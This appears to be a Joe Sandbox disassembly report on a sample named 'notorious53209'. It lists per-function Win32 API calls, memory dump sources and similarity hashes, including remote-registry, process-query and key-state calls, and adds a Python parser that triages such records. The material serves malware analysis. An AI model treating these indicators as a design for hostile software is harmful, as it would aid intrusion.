                                                  • Opcode Fuzzy Hash: 09c87945d1c3f6f4fa14e3739fb3028094ad8ca73d7451b458e73b1fc3e9f28e
                                                  • Instruction Fuzzy Hash: B1210471900108AEDB18AB78CC858FFB779FF45364F10421AF961E72E1DB355E0A9610
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009066D0
                                                  • LoadLibraryW.KERNEL32(?), ref: 009066D7
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009066EC
                                                  • DestroyWindow.USER32(?), ref: 009066F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                                                  • Instruction ID: 1d43bff58b5fc22a1444e75788d0def404a43abdce5221c0bf1c0663cd66c059
                                                  • Opcode Fuzzy Hash: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                                                  • Instruction Fuzzy Hash: 29219D7120020AAFEF104F68EC80EBB37ADEB59768F104629F911921E0D772CC61A760
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 008E705E
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E7091
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 008E70A3
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E70DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                                                  • Instruction ID: 0a19a64de08e5152bbc74bf931c841a5201c594ae6c2b8d807aa07d9e84374fb
                                                  • Opcode Fuzzy Hash: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                                                  • Instruction Fuzzy Hash: 31218E7450864AABDB209F3ADC05A9A77A8FF56724F204A19FCA0D72D0E7B099509B50
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008E712B
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E715D
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008E716E
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E71A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                                                  • Instruction ID: f591bdc3a56c1a99c8e1629faff4f4280848885110e2b28158b2e0719292eca7
                                                  • Opcode Fuzzy Hash: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                                                  • Instruction Fuzzy Hash: CF21B375508389ABDB209F6A9C04A9AB7E8FF56734F200619FDB0D32D0E770D951CB51
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EAEBF
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EAF13
                                                  • __swprintf.LIBCMT ref: 008EAF2C
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EAF6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: fc95bb8b40b6900f5a40435fe720f3b4aef58df229500c6d0cbd26f76920ec83
                                                  • Instruction ID: 796973e84abdc56c1af81819ab9705292bb51b3a92d7a68b86ca67bc7b5bfe1f
                                                  • Opcode Fuzzy Hash: fc95bb8b40b6900f5a40435fe720f3b4aef58df229500c6d0cbd26f76920ec83
                                                  • Instruction Fuzzy Hash: EF218330A00109AFCB10EF69CC85DAE7BB8FF89714B004069F949EB251DB71EE41DB62
                                                  APIs
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 008DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                                    • Part of subcall function 008DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                                    • Part of subcall function 008DA37C: GetCurrentThreadId.KERNEL32(00000000), ref: 008DA3B3
                                                    • Part of subcall function 008DA37C: AttachThreadInput.USER32(00000000), ref: 008DA3BA
                                                  • GetFocus.USER32 ref: 008DA554
                                                    • Part of subcall function 008DA3C5: GetParent.USER32(?), ref: 008DA3D3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DA59D
                                                  • EnumChildWindows.USER32(?,008DA615), ref: 008DA5C5
                                                  • __swprintf.LIBCMT ref: 008DA5DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  • Opcode ID: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                                                  • Instruction ID: 1ee15f607347eed9e3b8dc29c71c75972f5708316398cabb5558fee169996f03
                                                  • Opcode Fuzzy Hash: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                                                  • Instruction Fuzzy Hash: 5A11B471204208BBDF247F68EC85FEA377DFF48704F144176B908EA252CA749A459B76
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 008E2048
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: 3f42cf59d7f7542295fcf4a4cb0bee8f33cac2eed760bd337ff919b51af0c5e5
                                                  • Instruction ID: 80bc65c9564fda9704923516c55a6e15b72709917726d4a47495b65a72ddaad9
                                                  • Opcode Fuzzy Hash: 3f42cf59d7f7542295fcf4a4cb0bee8f33cac2eed760bd337ff919b51af0c5e5
                                                  • Instruction Fuzzy Hash: F1115B759142098FCF10EFA8D9914EEB7F4FF5A304F108568D855E7292EB32A906CF51
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEF1B
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEF4B
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FF07E
                                                  • CloseHandle.KERNEL32(?), ref: 008FF0FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                                                  • Instruction ID: 07ece44c84d1334fef289d17691e7bf6ff135245755e912084accfa81fac9db2
                                                  • Opcode Fuzzy Hash: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                                                  • Instruction Fuzzy Hash: DD8152716047119FD724EF28C886F2AB7E5FF88720F14881DF696DB292DB70AD418B52
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900388
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009003C7
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090040E
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0090043A
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900447
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 59593c8b4750be1e8484a30358fe20a6affc762aadf7a074d8f3ac37508d4292
                                                  • Instruction ID: 6685edd824a130673ab16c5db8da7bf47b45fd988f3a9baa6f94fc16c2fce2e2
                                                  • Opcode Fuzzy Hash: 59593c8b4750be1e8484a30358fe20a6affc762aadf7a074d8f3ac37508d4292
                                                  • Instruction Fuzzy Hash: 92513831208204AFD714EF68C891F6EB7E8FF88714F44892EF595972A1EB31E905DB52
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE88A
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE8B3
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE8F2
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE917
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE91F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 818f43cadc89a5ffb28fd25507eda93a745322608825ca69489fff09b7fc82b3
                                                  • Instruction ID: a98398eb4513fb86ac8511e43c6a1d0e99dea6e49bb561991cb2e44be22aea8b
                                                  • Opcode Fuzzy Hash: 818f43cadc89a5ffb28fd25507eda93a745322608825ca69489fff09b7fc82b3
                                                  • Instruction Fuzzy Hash: 86510935A00215DFCB15EF69C9819AEBBF5FF09310B1880A9E849EB362CB31ED11DB51
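The per-function records above all share one layout (an APIs list with direct calls and "Part of subcall function" lines, the memory dump source, and a Similarity block with API ID, String ID and opcode hashes). Sorting hundreds of them by hand is impractical, so here is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling, that parses that layout into records and tags each one by the Win32 APIs it calls directly plus the strings it references. The sample text is a constructed copy of two records from this section with the repeated Associated lines trimmed, and the rule names ("stdio-redirect-to-nul" and so on) are this example's own labels, not report signatures.

```python
"""Parse the per-function records of a Joe Sandbox disassembly listing (the blocks headed
'APIs', 'Memory Dump Source', 'Similarity') into dicts and tag them by the Win32 APIs called."""
import re

# Constructed input: two records in the report's layout, with the repeated
# 'Associated:' lines trimmed. Real input is the text of the report section.
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 008E705E
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E7091
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E70DD
Strings
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
• Instruction Fuzzy Hash: 31218E7450864AABDB209F3ADC05A9A77A8FF56724F204A19FCA0D72D0E7B099509B50
APIs
  • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEF1B
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FF07E
• CloseHandle.KERNEL32(?), ref: 008FF0FF
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
"""

# One API call line: Name.MODULE(args), ref: ADDR (no parens on CRT helpers such as _memmove)
CALL_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_PREFIX = "Part of subcall function "
FIELDS = ("API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID",
          "Opcode Fuzzy Hash", "Instruction Fuzzy Hash", "Source File", "Snapshot File")

def parse_records(text):
    """A record opens at 'APIs', or at 'Memory Dump Source' once the previous one is complete."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source"
                              and (cur is None or "Source File" in cur)):
            cur = {"calls": [], "subcalls": [], "strings": []}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                                  # plain section headers
        body = line.lstrip("• ").strip()
        if body.startswith(SUBCALL_PREFIX):           # API reached through a callee
            caller, _, rest = body[len(SUBCALL_PREFIX):].partition(": ")
            m = CALL_RE.match(rest)
            if m:
                cur["subcalls"].append((caller, m["name"], m["module"]))
            continue
        m = CALL_RE.match(body)
        if m:                                         # direct API call
            cur["calls"].append({"api": m["name"], "module": m["module"], "ref": m["ref"],
                                 "args": m["args"].split(",") if m["args"] else []})
            continue
        key, sep, value = body.partition(":")
        if sep and key in FIELDS:                     # Similarity / dump metadata
            cur[key] = value.strip()
    for r in records:                                 # 'String ID' is '$'-joined, e.g. ComboBox$ListBox
        r["strings"] = [s for s in r.get("String ID", "").split("$") if s]
    return records

# Illustrative triage rules (labels are this example's, not Joe Sandbox signatures): a rule
# fires when every listed API is called directly and every listed string is present.
RULES = {
    "stdio-redirect-to-nul": ({"GetStdHandle", "CreatePipe", "CreateFileW"}, {"nul"}),
    "process-stats-query":   ({"OpenProcess", "GetProcessMemoryInfo"}, set()),
    "remote-registry-enum":  ({"RegConnectRegistryW", "RegEnumKeyExW"}, set()),
}

def tag_records(records, rules=RULES):
    """Return (Opcode ID prefix, sorted matching rule names) per record."""
    out = []
    for r in records:
        apis = {c["api"] for c in r["calls"]}
        strings = set(r["strings"])
        tags = sorted(n for n, (need_api, need_str) in rules.items()
                      if need_api <= apis and need_str <= strings)
        out.append((r.get("Opcode ID", "")[:16], tags))
    return out

if __name__ == "__main__":
    for opcode, tags in tag_records(parse_records(SAMPLE)):
        print(opcode or "<no opcode id>", tags)
```

Only direct calls feed the rules; "Part of subcall function" entries are kept separately so that a shared helper such as _memmove does not make every caller look alike. Feeding the whole section through parse_records and grouping by the "API String ID" field gives a quick view of which runtime functions share an API and string profile, which is the same information the report's Similarity block encodes per function.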
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                                                  • Instruction ID: f60d54fefe89b32cf8997d636cb0aaf950443a75c21007c7e75cbb5c94d0893f
                                                  • Opcode Fuzzy Hash: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                                                  • Instruction Fuzzy Hash: 2441D139904304AFD720DF28CC58FA9BBACFB09320F154265F855A72E1D770AE81DAD2
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00882357
                                                  • ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 95b161cc0927f50e4f5f1dc5300dc7182a120870e151420288181046f38ed2ba
                                                  • Instruction ID: 87dcc7880c9624c1cd4d7aae12439e96ec8ddfd174547df84e128421f564d77d
                                                  • Opcode Fuzzy Hash: 95b161cc0927f50e4f5f1dc5300dc7182a120870e151420288181046f38ed2ba
                                                  • Instruction Fuzzy Hash: 1C417F75504119FFDF19AF68C854AEDBB74FB45324F20435AF828E23A0C7346A94DB91
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D695D
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 008D69A9
                                                  • TranslateMessage.USER32(?), ref: 008D69D2
                                                  • DispatchMessageW.USER32(?), ref: 008D69DC
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D69EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
